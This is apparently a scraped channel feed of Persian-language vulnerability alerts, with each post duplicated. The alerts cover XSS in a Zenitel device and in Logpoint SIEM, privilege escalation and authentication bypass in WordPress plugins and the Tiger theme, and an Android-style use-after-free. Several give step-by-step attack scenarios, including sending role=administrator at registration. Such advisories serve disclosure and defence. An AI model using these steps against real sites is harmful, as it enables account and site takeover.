🚨 New Vulnerability Alert: CVE-2025-64130
🔴 Risk Level: CRITICAL (Score: 9.8)
🔎 شرح آسیبپذیری:
دستگاه
یک مهاجم از راه دور میتواند با سوءاستفاده از این نقص امنیتی، کدهای جاوا اسکریپت دلخواه را در مرورگر کاربر قربانی اجرا کند. این اتفاق زمانی رخ میدهد که دستگاه، ورودی کاربر را بدون پاکسازی و اعتبارسنجی مناسب، در صفحه وب بازتاب میدهد.
💥 تأثیرات و خطرات:
اجرای موفق این حمله میتواند منجر به موارد زیر شود:
- سرقت کوکیهای نشست (Session Cookies) و ربودن حساب کاربری (Session Hijacking).
- هدایت کاربر به وبسایتهای مخرب و صفحات فیشینگ برای سرقت اطلاعات حساس.
- اجرای کدهای مخرب در بستر یک وبسایت معتبر (از دید مرورگر).
- دسترسی به اطلاعات حساس وارد شده توسط کاربر در صفحه آسیبپذیر.
🎬 سناریوی حمله:
۱. مهاجم یک لینک یا URL دستکاریشده حاوی کد مخرب جاوا اسکریپت را ایجاد میکند.
۲. این لینک از طریق ایمیل، پیامرسان یا شبکههای اجتماعی برای قربانی ارسال میشود و او را ترغیب به کلیک کردن میکند.
۳. قربانی روی لینک کلیک کرده و درخواستی به سرور آسیبپذیر
۴. سرور، کد مخرب را بدون اعتبارسنجی مناسب، در پاسخ خود به مرورگر قربانی بازتاب (Reflect) میدهد.
۵. مرورگر قربانی، با فرض اینکه کد از سمت سرور معتبر آمده است، آن را اجرا میکند. در این لحظه، حمله با موفقیت انجام شده و کد مخرب (برای مثال، کد سرقت کوکی) فعال میشود.
---
توصیه میشود کاربران دستگاههای مذکور منتظر بهروزرسانی امنیتی از سوی شرکت Zenitel بوده و تا حد امکان از کلیک بر روی لینکهای ناشناس خودداری کنند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
🔎 شرح آسیبپذیری:
دستگاه
Zenitel TCIV-3+ تحت تأثیر یک آسیبپذیری با شناسه CVE-2025-64130 قرار دارد. این آسیبپذیری از نوع Cross-Site Scripting (XSS) بازتابی (Reflected XSS) است.یک مهاجم از راه دور میتواند با سوءاستفاده از این نقص امنیتی، کدهای جاوا اسکریپت دلخواه را در مرورگر کاربر قربانی اجرا کند. این اتفاق زمانی رخ میدهد که دستگاه، ورودی کاربر را بدون پاکسازی و اعتبارسنجی مناسب، در صفحه وب بازتاب میدهد.
💥 تأثیرات و خطرات:
اجرای موفق این حمله میتواند منجر به موارد زیر شود:
- سرقت کوکیهای نشست (Session Cookies) و ربودن حساب کاربری (Session Hijacking).
- هدایت کاربر به وبسایتهای مخرب و صفحات فیشینگ برای سرقت اطلاعات حساس.
- اجرای کدهای مخرب در بستر یک وبسایت معتبر (از دید مرورگر).
- دسترسی به اطلاعات حساس وارد شده توسط کاربر در صفحه آسیبپذیر.
🎬 سناریوی حمله:
۱. مهاجم یک لینک یا URL دستکاریشده حاوی کد مخرب جاوا اسکریپت را ایجاد میکند.
۲. این لینک از طریق ایمیل، پیامرسان یا شبکههای اجتماعی برای قربانی ارسال میشود و او را ترغیب به کلیک کردن میکند.
۳. قربانی روی لینک کلیک کرده و درخواستی به سرور آسیبپذیر
Zenitel ارسال میکند که حاوی کد مخرب است.۴. سرور، کد مخرب را بدون اعتبارسنجی مناسب، در پاسخ خود به مرورگر قربانی بازتاب (Reflect) میدهد.
۵. مرورگر قربانی، با فرض اینکه کد از سمت سرور معتبر آمده است، آن را اجرا میکند. در این لحظه، حمله با موفقیت انجام شده و کد مخرب (برای مثال، کد سرقت کوکی) فعال میشود.
---
توصیه میشود کاربران دستگاههای مذکور منتظر بهروزرسانی امنیتی از سوی شرکت Zenitel بوده و تا حد امکان از کلیک بر روی لینکهای ناشناس خودداری کنند.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13538
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری CVE-2025-13538
افزونه WordPress FindAll Listing - افزایش سطح دسترسی
---
📝 توضیحات آسیبپذیری:
این آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در افزونه FindAll Listing برای وردپرس، در تمام نسخهها تا 1.0.5 (شامل این نسخه) وجود دارد.
ضعف اصلی در تابع
نکته مهم: این آسیبپذیری تنها زمانی قابل بهرهبرداری است که افزونه مکمل آن، یعنی FindAll Membership، نیز روی وبسایت فعال باشد، زیرا فرآیند ثبتنام توسط این افزونه مدیریت میشود.
💣 تأثیر:
مهاجم بدون نیاز به احراز هویت (Unauthenticated Attacker) میتواند با ارسال پارامتر
دستیابی به این سطح از دسترسی به معنای کنترل کامل وبسایت است. مهاجم میتواند:
- محتوا را تغییر داده یا حذف کند.
- اطلاعات کاربران را سرقت کند.
- کدهای مخرب یا درهای پشتی (Backdoors) نصب کند.
- وبسایت را از دسترس خارج کرده یا آن را تخریب (Deface) نماید.
🎯 سناریوی حمله:
۱. مهاجم یک وبسایت وردپرسی را شناسایی میکند که هر دو افزونه FindAll Listing (نسخه ۱.۰.۵ یا قدیمیتر) و FindAll Membership روی آن فعال هستند.
۲. به صفحه ثبتنام وبسایت مراجعه کرده و اطلاعات اولیه مانند نام کاربری و ایمیل را وارد میکند.
۳. قبل از ارسال نهایی فرم، درخواست HTTP مربوط به ثبتنام را با ابزاری مانند Burp Suite رهگیری میکند.
۴. پارامتر
۵. درخواست دستکاریشده را به سرور ارسال میکند.
۶. سیستم بدون هیچگونه اعتبارسنجی، یک حساب کاربری جدید با دسترسی کامل مدیر کل ایجاد میکند و مهاجم با آن وارد سایت میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری CVE-2025-13538
افزونه WordPress FindAll Listing - افزایش سطح دسترسی
---
📝 توضیحات آسیبپذیری:
این آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در افزونه FindAll Listing برای وردپرس، در تمام نسخهها تا 1.0.5 (شامل این نسخه) وجود دارد.
ضعف اصلی در تابع
findall_listing_user_registration_additional_params نهفته است که هنگام ثبتنام کاربر جدید، هیچگونه اعتبارسنجی روی نقش کاربری (role) ارسالی انجام نمیدهد.نکته مهم: این آسیبپذیری تنها زمانی قابل بهرهبرداری است که افزونه مکمل آن، یعنی FindAll Membership، نیز روی وبسایت فعال باشد، زیرا فرآیند ثبتنام توسط این افزونه مدیریت میشود.
💣 تأثیر:
مهاجم بدون نیاز به احراز هویت (Unauthenticated Attacker) میتواند با ارسال پارامتر
role=administrator در فرآیند ثبتنام، یک حساب کاربری با سطح دسترسی مدیر کل (Administrator) برای خود ایجاد کند.دستیابی به این سطح از دسترسی به معنای کنترل کامل وبسایت است. مهاجم میتواند:
- محتوا را تغییر داده یا حذف کند.
- اطلاعات کاربران را سرقت کند.
- کدهای مخرب یا درهای پشتی (Backdoors) نصب کند.
- وبسایت را از دسترس خارج کرده یا آن را تخریب (Deface) نماید.
🎯 سناریوی حمله:
۱. مهاجم یک وبسایت وردپرسی را شناسایی میکند که هر دو افزونه FindAll Listing (نسخه ۱.۰.۵ یا قدیمیتر) و FindAll Membership روی آن فعال هستند.
۲. به صفحه ثبتنام وبسایت مراجعه کرده و اطلاعات اولیه مانند نام کاربری و ایمیل را وارد میکند.
۳. قبل از ارسال نهایی فرم، درخواست HTTP مربوط به ثبتنام را با ابزاری مانند Burp Suite رهگیری میکند.
۴. پارامتر
role را با مقدار administrator به درخواست اضافه یا مقدار آن را تغییر میدهد.۵. درخواست دستکاریشده را به سرور ارسال میکند.
۶. سیستم بدون هیچگونه اعتبارسنجی، یک حساب کاربری جدید با دسترسی کامل مدیر کل ایجاد میکند و مهاجم با آن وارد سایت میشود.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13539
🔴 Risk Level: CRITICAL (Score: 9.8)
- تحلیل آسیبپذیری امنیتی -
CVE-2025-13539
---
📝 توضیحات آسیبپذیری:
آسیبپذیری از نوع دور زدن احراز هویت (Authentication Bypass) در پلاگین
ریشه مشکل در این است که پلاگین پس از تایید هویت کاربر از طریق سرویسهای گوگل یا فیسبوک (توابع
---
💥 تاثیرات:
مهاجم غیر احراز هویت شده (Unauthenticated) میتواند با بهرهبرداری از این آسیبپذیری، به حساب کاربری هر فردی در وبسایت، از جمله کاربران مدیر (Administrator)، دسترسی پیدا کند.
این دسترسی به معنای کنترل کامل وبسایت است و میتواند منجر به عواقب زیر شود:
- سرقت اطلاعات حساس کاربران و وبسایت
- تخریب وبسایت (Defacement)
- تزریق بدافزار و کدهای مخرب
- ایجاد درهای پشتی (Backdoors) برای دسترسیهای آتی
- سوءاستفاده از منابع سرور
---
🎭 سناریوی حمله:
یک مهاجم برای بهرهبرداری از این آسیبپذیری، مراحل زیر را طی میکند:
۱. ابتدا، مهاجم باید آدرس ایمیل یک کاربر با سطح دسترسی بالا (مانند مدیر) را به دست آورد.
۲. سپس، مهاجم یک حساب کاربری عادی یا موقت برای خود در وبسایت ایجاد میکند (طبق توضیحات رسمی، این قابلیت به صورت پیشفرض فعال است).
۳. در مرحله بعد، مهاجم فرآیند ورود از طریق گوگل یا فیسبوک را آغاز کرده و در این فرآیند، ایمیل کاربر مدیر را وارد میکند.
۴. به دلیل وجود نقص منطقی در پلاگین، سیستم پس از یک بررسی اولیه، به اشتباه نشست کاربری را برای حساب مدیر ایجاد کرده و مهاجم را با اختیارات کامل مدیر وارد وبسایت میکند، بدون آنکه نیاز به تایید هویت واقعی از سمت گوگل یا فیسبوک باشد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
- تحلیل آسیبپذیری امنیتی -
CVE-2025-13539
---
📝 توضیحات آسیبپذیری:
آسیبپذیری از نوع دور زدن احراز هویت (Authentication Bypass) در پلاگین
FindAll Membership برای وردپرس شناسایی شده است. این ضعف امنیتی تمام نسخههای این پلاگین تا نسخه 1.0.4 (شامل این نسخه) را تحت تاثیر قرار میدهد.ریشه مشکل در این است که پلاگین پس از تایید هویت کاربر از طریق سرویسهای گوگل یا فیسبوک (توابع
findall_membership_check_google_user و findall_membership_check_facebook_user)، از اطلاعات تایید شده برای ایجاد نشست (Session) و ورود نهایی کاربر به درستی استفاده نمیکند. این شکاف به مهاجم اجازه میدهد تا فرآیند احراز هویت را دور زده و به جای کاربر اصلی وارد سیستم شود.---
💥 تاثیرات:
مهاجم غیر احراز هویت شده (Unauthenticated) میتواند با بهرهبرداری از این آسیبپذیری، به حساب کاربری هر فردی در وبسایت، از جمله کاربران مدیر (Administrator)، دسترسی پیدا کند.
این دسترسی به معنای کنترل کامل وبسایت است و میتواند منجر به عواقب زیر شود:
- سرقت اطلاعات حساس کاربران و وبسایت
- تخریب وبسایت (Defacement)
- تزریق بدافزار و کدهای مخرب
- ایجاد درهای پشتی (Backdoors) برای دسترسیهای آتی
- سوءاستفاده از منابع سرور
---
🎭 سناریوی حمله:
یک مهاجم برای بهرهبرداری از این آسیبپذیری، مراحل زیر را طی میکند:
۱. ابتدا، مهاجم باید آدرس ایمیل یک کاربر با سطح دسترسی بالا (مانند مدیر) را به دست آورد.
۲. سپس، مهاجم یک حساب کاربری عادی یا موقت برای خود در وبسایت ایجاد میکند (طبق توضیحات رسمی، این قابلیت به صورت پیشفرض فعال است).
۳. در مرحله بعد، مهاجم فرآیند ورود از طریق گوگل یا فیسبوک را آغاز کرده و در این فرآیند، ایمیل کاربر مدیر را وارد میکند.
۴. به دلیل وجود نقص منطقی در پلاگین، سیستم پس از یک بررسی اولیه، به اشتباه نشست کاربری را برای حساب مدیر ایجاد کرده و مهاجم را با اختیارات کامل مدیر وارد وبسایت میکند، بدون آنکه نیاز به تایید هویت واقعی از سمت گوگل یا فیسبوک باشد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13540
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل و گزارش آسیبپذیری | CVE-2025-13540
شرح آسیبپذیری:
یک آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در افزونه
نقص امنیتی در تابع
تاثیر:
مهاجم بدون نیاز به احراز هویت (Unauthenticated) میتواند با ثبت یک حساب کاربری جدید و اختصاص نقش
این سطح از دسترسی به مهاجم اجازه میدهد تا اطلاعات حساس را سرقت کند، بدافزار تزریق کند، محتوای سایت را تغییر داده، کاربران دیگر را حذف کرده و یا سایت را به طور کامل از دسترس خارج کند.
سناریو:
۱. مهاجم فرم ثبتنام وبسایتی را که از نسخه آسیبپذیر افزونه استفاده میکند، شناسایی میکند.
۲. مهاجم با ارسال یک درخواست ثبتنام (معمولاً از طریق REST API)، در کنار اطلاعاتی مانند نام کاربری و رمز عبور، پارامتر مربوط به نقش کاربری را با مقدار
۳. به دلیل عدم وجود مکانیزم اعتبارسنجی در تابع آسیبپذیر، سیستم یک حساب کاربری جدید با بالاترین سطح دسترسی (مدیر کل) برای مهاجم ایجاد میکند.
۴. مهاجم اکنون میتواند با حساب کاربری ایجاد شده وارد پنل مدیریت شده و کنترل کامل سایت را در اختیار بگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل و گزارش آسیبپذیری | CVE-2025-13540
شرح آسیبپذیری:
یک آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در افزونه
Tiare Membership برای وردپرس شناسایی شده است. این آسیبپذیری تمامی نسخههای 1.2 و پایینتر را تحت تاثیر قرار میدهد.نقص امنیتی در تابع
tiare_membership_init_rest_api_register وجود دارد. این تابع هنگام ثبتنام یک کاربر جدید، نقش کاربری (User Role) ارسال شده را به درستی اعتبارسنجی نمیکند. در نتیجه، یک کاربر غیرمجاز میتواند در حین فرآیند ثبتنام، هر نقشی را برای حساب کاربری خود انتخاب کند.تاثیر:
مهاجم بدون نیاز به احراز هویت (Unauthenticated) میتواند با ثبت یک حساب کاربری جدید و اختصاص نقش
administrator به آن، کنترل کامل وبسایت را به دست آورد.این سطح از دسترسی به مهاجم اجازه میدهد تا اطلاعات حساس را سرقت کند، بدافزار تزریق کند، محتوای سایت را تغییر داده، کاربران دیگر را حذف کرده و یا سایت را به طور کامل از دسترس خارج کند.
سناریو:
۱. مهاجم فرم ثبتنام وبسایتی را که از نسخه آسیبپذیر افزونه استفاده میکند، شناسایی میکند.
۲. مهاجم با ارسال یک درخواست ثبتنام (معمولاً از طریق REST API)، در کنار اطلاعاتی مانند نام کاربری و رمز عبور، پارامتر مربوط به نقش کاربری را با مقدار
administrator ارسال میکند.۳. به دلیل عدم وجود مکانیزم اعتبارسنجی در تابع آسیبپذیر، سیستم یک حساب کاربری جدید با بالاترین سطح دسترسی (مدیر کل) برای مهاجم ایجاد میکند.
۴. مهاجم اکنون میتواند با حساب کاربری ایجاد شده وارد پنل مدیریت شده و کنترل کامل سایت را در اختیار بگیرد.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13675
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13675
افزایش سطح دسترسی در قالب وردپرس Tiger
---
📜 توضیحات آسیبپذیری:
این آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در قالب
نقطه ضعف اصلی در فایل
💥 تأثیر:
یک مهاجم غیر احراز هویت شده (Unauthenticated) میتواند با سوءاستفاده از این ضعف، یک حساب کاربری با بالاترین سطح دسترسی، یعنی
این امر به مهاجم کنترل کامل وبسایت را میدهد و امکان انجام هرگونه عملیات مخرب، از جمله سرقت اطلاعات حساس، تغییر محتوای سایت، نصب بدافزار و یا حذف کامل وبسایت را فراهم میآورد.
🎭 سناریوی حمله:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر قالب
۲. یک درخواست ثبتنام به فایل
۳. در پارامترهای این درخواست، مقدار مربوط به نقش کاربری را برابر با
۴. سیستم بدون هیچگونه اعتبارسنجی، درخواست را پردازش کرده و یک حساب کاربری جدید با دسترسی کامل مدیریتی ایجاد میکند.
۵. اکنون مهاجم میتواند با اطلاعات حساب کاربری جدید وارد پیشخوان وردپرس شده و کنترل کامل سایت را در دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🔴 Risk Level: CRITICAL (Score: 9.8)
تحلیل آسیبپذیری: CVE-2025-13675
افزایش سطح دسترسی در قالب وردپرس Tiger
---
📜 توضیحات آسیبپذیری:
این آسیبپذیری از نوع افزایش سطح دسترسی (Privilege Escalation) در قالب
Tiger برای وردپرس، در تمام نسخههای موجود تا نسخه 101.2.1 (شامل این نسخه) وجود دارد.نقطه ضعف اصلی در فایل
paypal-submit.php قرار دارد که هنگام ثبتنام کاربر جدید، نقش کاربری (User Role) ارسالی توسط کاربر را به درستی اعتبارسنجی و محدود نمیکند.💥 تأثیر:
یک مهاجم غیر احراز هویت شده (Unauthenticated) میتواند با سوءاستفاده از این ضعف، یک حساب کاربری با بالاترین سطح دسترسی، یعنی
administrator، برای خود ایجاد کند.این امر به مهاجم کنترل کامل وبسایت را میدهد و امکان انجام هرگونه عملیات مخرب، از جمله سرقت اطلاعات حساس، تغییر محتوای سایت، نصب بدافزار و یا حذف کامل وبسایت را فراهم میآورد.
🎭 سناریوی حمله:
۱. مهاجم یک وبسایت را که از نسخه آسیبپذیر قالب
Tiger استفاده میکند، شناسایی میکند.۲. یک درخواست ثبتنام به فایل
paypal-submit.php ارسال میکند.۳. در پارامترهای این درخواست، مقدار مربوط به نقش کاربری را برابر با
administrator قرار میدهد.۴. سیستم بدون هیچگونه اعتبارسنجی، درخواست را پردازش کرده و یک حساب کاربری جدید با دسترسی کامل مدیریتی ایجاد میکند.
۵. اکنون مهاجم میتواند با اطلاعات حساب کاربری جدید وارد پیشخوان وردپرس شده و کنترل کامل سایت را در دست بگیرد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-13680
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-13680
ارتقاء سطح دسترسی در قالب Tiger وردپرس
---
🐞 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه
ریشه این مشکل در عدم اعتبارسنجی و کنترل دسترسی مناسب بر روی تابع
💥 تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کنترل کامل وبسایت وردپرسی را در دست بگیرد. پس از دریافت دسترسی مدیریتی، مهاجم قادر خواهد بود اقدامات مخرب زیر را انجام دهد:
- نصب افزونههای مخرب و شلهای تحت وب (Web Shells).
- ایجاد، حذف یا تغییر تمامی محتوای وبسایت.
- ایجاد کاربران مدیر جدید برای حفظ دسترسی.
- سرقت اطلاعات حساس کاربران، از جمله اطلاعات شخصی و رمزهای عبور.
- تزریق بدافزار و هدایت کاربران به وبسایتهای فیشینگ.
در عمل، این آسیبپذیری میتواند منجر به از دست رفتن کامل محرمانگی، یکپارچگی و در دسترس بودن وبسایت شود.
🎭 سناریو:
یک سناریوی حمله به شرح زیر است:
۱. مهاجم با ثبتنام در وبسایت هدف، یک حساب کاربری عادی با نقش Subscriber ایجاد میکند.
۲. سپس با تحلیل کدهای قالب یا ارسال درخواستهای دستکاریشده، نقطهای را که تابع
۳. مهاجم درخواستی را به سرور ارسال میکند و در پارامتر مربوط به نقش کاربری، مقدار
۴. به دلیل نبود کنترلهای امنیتی لازم، سیستم درخواست را معتبر دانسته و نقش کاربری مهاجم را به مدیر کل تغییر میدهد. از این لحظه به بعد، مهاجم کنترل کامل وبسایت را در اختیار دارد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.8)
تحلیل آسیبپذیری | CVE-2025-13680
ارتقاء سطح دسترسی در قالب Tiger وردپرس
---
🐞 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع ارتقاء سطح دسترسی (Privilege Escalation) با شناسه
CVE-2025-13680 در قالب Tiger برای سیستم مدیریت محتوای وردپرس شناسایی شده است. این ضعف امنیتی تمامی نسخههای این قالب تا نسخه 101.2.1 (شامل این نسخه) را تحت تأثیر قرار میدهد.ریشه این مشکل در عدم اعتبارسنجی و کنترل دسترسی مناسب بر روی تابع
$user->set_role() است. این تابع به کاربران اجازه میدهد نقش کاربری خود را در سیستم تغییر دهند. در نتیجه، یک مهاجم احرازهویتشده با حداقل سطح دسترسی (مانند نقش Subscriber) میتواند از این ضعف سوءاستفاده کرده و سطح دسترسی خود را به مدیر کل (Administrator) ارتقاء دهد.💥 تأثیر:
بهرهبرداری موفق از این آسیبپذیری به مهاجم اجازه میدهد تا کنترل کامل وبسایت وردپرسی را در دست بگیرد. پس از دریافت دسترسی مدیریتی، مهاجم قادر خواهد بود اقدامات مخرب زیر را انجام دهد:
- نصب افزونههای مخرب و شلهای تحت وب (Web Shells).
- ایجاد، حذف یا تغییر تمامی محتوای وبسایت.
- ایجاد کاربران مدیر جدید برای حفظ دسترسی.
- سرقت اطلاعات حساس کاربران، از جمله اطلاعات شخصی و رمزهای عبور.
- تزریق بدافزار و هدایت کاربران به وبسایتهای فیشینگ.
در عمل، این آسیبپذیری میتواند منجر به از دست رفتن کامل محرمانگی، یکپارچگی و در دسترس بودن وبسایت شود.
🎭 سناریو:
یک سناریوی حمله به شرح زیر است:
۱. مهاجم با ثبتنام در وبسایت هدف، یک حساب کاربری عادی با نقش Subscriber ایجاد میکند.
۲. سپس با تحلیل کدهای قالب یا ارسال درخواستهای دستکاریشده، نقطهای را که تابع
$user->set_role() بدون بررسی سطح دسترسی کاربر فعلی فراخوانی میشود، شناسایی میکند.۳. مهاجم درخواستی را به سرور ارسال میکند و در پارامتر مربوط به نقش کاربری، مقدار
administrator را تنظیم مینماید.۴. به دلیل نبود کنترلهای امنیتی لازم، سیستم درخواست را معتبر دانسته و نقش کاربری مهاجم را به مدیر کل تغییر میدهد. از این لحظه به بعد، مهاجم کنترل کامل وبسایت را در اختیار دارد.
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-66359
🟠 Risk Level: HIGH (Score: 8.5)
🔬 تحلیل آسیبپذیری: CVE-2025-66359
Logpoint SIEM - Cross-Site Scripting (XSS)
---
🔬 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع Cross-Site Scripting (XSS) در پلتفرم
این شرایط به یک مهاجم اجازه میدهد تا با تزریق اسکریپتهای مخرب در سمت کلاینت (مرورگر)، کدهای دلخواه خود را در بستر نشست (Session) کاربری قربانی اجرا نماید.
💥 تأثیرات:
مهاجم با بهرهبرداری موفق از این آسیبپذیری قادر خواهد بود اقدامات زیر را انجام دهد:
▪️ سرقت نشستهای کاربری (Session Hijacking)، به خصوص حسابهای با دسترسی بالا مانند مدیران سیستم.
▪️ سرقت اطلاعات حساس نمایش داده شده در پنل Logpoint، مانند لاگها و گزارشات امنیتی.
▪️ اجرای حملات فیشینگ برای به سرقت بردن اطلاعات ورود کاربران.
▪️ تغییر و دستکاری ظاهر رابط کاربری به منظور فریب کاربر یا ایجاد اختلال.
▪️ هدایت کاربر به وبسایتهای مخرب.
🎭 سناریوی حمله:
۱. مهاجم یک اسکریپت مخرب (Payload) را در دادهای که قرار است توسط Logpoint پردازش و ذخیره شود، تزریق میکند. این داده میتواند بخشی از یک لاگ، یک هدر HTTP یا هر ورودی دیگری باشد که در پنل نمایش داده میشود.
۲. پلتفرم Logpoint این داده آلوده را بدون پاکسازی و اعتبارسنجی مناسب دریافت و در پایگاه داده خود ذخیره میکند.
۳. هنگامی که یک کاربر معتبر (مانند یک تحلیلگر امنیتی) وارد پنل وب Logpoint شده و صفحهای که حاوی این داده مخرب است را مشاهده میکند (برای مثال، در بخش جستجوی لاگها یا داشبوردها)، مرورگر کاربر اسکریپت تزریق شده را به عنوان کدی معتبر اجرا میکند.
۴. در نتیجه، اسکریپت مخرب در مرورگر قربانی اجرا شده و میتواند منجر به سرقت کوکی نشست (Session Cookie) او و در اختیار گرفتن کامل حساب کاربریاش شود.
---
🛡️ راهکار و پیشنهاد امنیتی:
به تمامی مدیران سیستم و کاربران Logpoint اکیداً توصیه میشود در اسرع وقت نسبت به بهروزرسانی پلتفرم خود به نسخه
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.5)
🔬 تحلیل آسیبپذیری: CVE-2025-66359
Logpoint SIEM - Cross-Site Scripting (XSS)
---
🔬 توضیحات آسیبپذیری:
یک آسیبپذیری از نوع Cross-Site Scripting (XSS) در پلتفرم
Logpoint و در نسخههای پیش از 7.7.0 شناسایی شده است. این ضعف امنیتی ناشی از عدم اعتبارسنجی کافی دادههای ورودی و همچنین عدم خروجیسازی مناسب (Output Escaping) در چندین بخش از رابط کاربری این نرمافزار است.این شرایط به یک مهاجم اجازه میدهد تا با تزریق اسکریپتهای مخرب در سمت کلاینت (مرورگر)، کدهای دلخواه خود را در بستر نشست (Session) کاربری قربانی اجرا نماید.
💥 تأثیرات:
مهاجم با بهرهبرداری موفق از این آسیبپذیری قادر خواهد بود اقدامات زیر را انجام دهد:
▪️ سرقت نشستهای کاربری (Session Hijacking)، به خصوص حسابهای با دسترسی بالا مانند مدیران سیستم.
▪️ سرقت اطلاعات حساس نمایش داده شده در پنل Logpoint، مانند لاگها و گزارشات امنیتی.
▪️ اجرای حملات فیشینگ برای به سرقت بردن اطلاعات ورود کاربران.
▪️ تغییر و دستکاری ظاهر رابط کاربری به منظور فریب کاربر یا ایجاد اختلال.
▪️ هدایت کاربر به وبسایتهای مخرب.
🎭 سناریوی حمله:
۱. مهاجم یک اسکریپت مخرب (Payload) را در دادهای که قرار است توسط Logpoint پردازش و ذخیره شود، تزریق میکند. این داده میتواند بخشی از یک لاگ، یک هدر HTTP یا هر ورودی دیگری باشد که در پنل نمایش داده میشود.
۲. پلتفرم Logpoint این داده آلوده را بدون پاکسازی و اعتبارسنجی مناسب دریافت و در پایگاه داده خود ذخیره میکند.
۳. هنگامی که یک کاربر معتبر (مانند یک تحلیلگر امنیتی) وارد پنل وب Logpoint شده و صفحهای که حاوی این داده مخرب است را مشاهده میکند (برای مثال، در بخش جستجوی لاگها یا داشبوردها)، مرورگر کاربر اسکریپت تزریق شده را به عنوان کدی معتبر اجرا میکند.
۴. در نتیجه، اسکریپت مخرب در مرورگر قربانی اجرا شده و میتواند منجر به سرقت کوکی نشست (Session Cookie) او و در اختیار گرفتن کامل حساب کاربریاش شود.
---
🛡️ راهکار و پیشنهاد امنیتی:
به تمامی مدیران سیستم و کاربران Logpoint اکیداً توصیه میشود در اسرع وقت نسبت به بهروزرسانی پلتفرم خود به نسخه
7.7.0 یا بالاتر اقدام نمایند.🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🚨 New Vulnerability Alert: CVE-2025-58303
🟠 Risk Level: HIGH (Score: 8.4)
🔬 شرح آسیبپذیری:
یک آسیبپذیری از نوع Use-After-Free (UAF) با شناسه
این نقص امنیتی زمانی رخ میدهد که برنامه پس از آزاد کردن یک بخش از حافظه، همچنان تلاش میکند از آن استفاده کند. این امر منجر به خرابی حافظه و رفتار غیرقابل پیشبینی در برنامه میشود.
💥 میزان تأثیر:
بهرهبرداری موفق از این آسیبپذیری میتواند به طور مستقیم بر در دسترس بودن (Availability) سیستم تأثیر بگذارد.
در بدترین حالت، این نقص امنیتی میتواند منجر به یک حمله محرومسازی از سرویس (Denial of Service - DoS) شود. این امر با از کار انداختن فرآیند ضبط صفحه یا حتی کل رابط کاربری سیستم، دستگاه را غیرقابل استفاده کرده و کاربر را مجبور به راهاندازی مجدد آن میکند.
🎬 سناریوی حمله:
مهاجم میتواند یک اپلیکیشن مخرب طراحی کند که از کاربر درخواست مجوز برای ضبط صفحه نمایش را مینماید.
پس از دریافت مجوز، اپلیکیشن با ارسال دادههای دستکاریشده و غیرمنتظره به فریمورک ضبط صفحه، باعث ایجاد یک وضعیت Use-After-Free میشود. این عمل با مجبور کردن سیستم به آزاد کردن حافظه در حین استفاده از آن صورت میگیرد. در نتیجه، سرویس مربوطه دچار اختلال شده و از کار میافتد (Crash) و در نهایت منجر به قفل شدن یا راهاندازی مجدد دستگاه میشود.
---
🔗 Our Channels:
🆔 @RedTeamAPT
🤖 @RedTeamAPT_bot
🚨 @RedTeamCVE
📡 @RedTeamSignal
🟠 Risk Level: HIGH (Score: 8.4)
🔬 شرح آسیبپذیری:
یک آسیبپذیری از نوع Use-After-Free (UAF) با شناسه
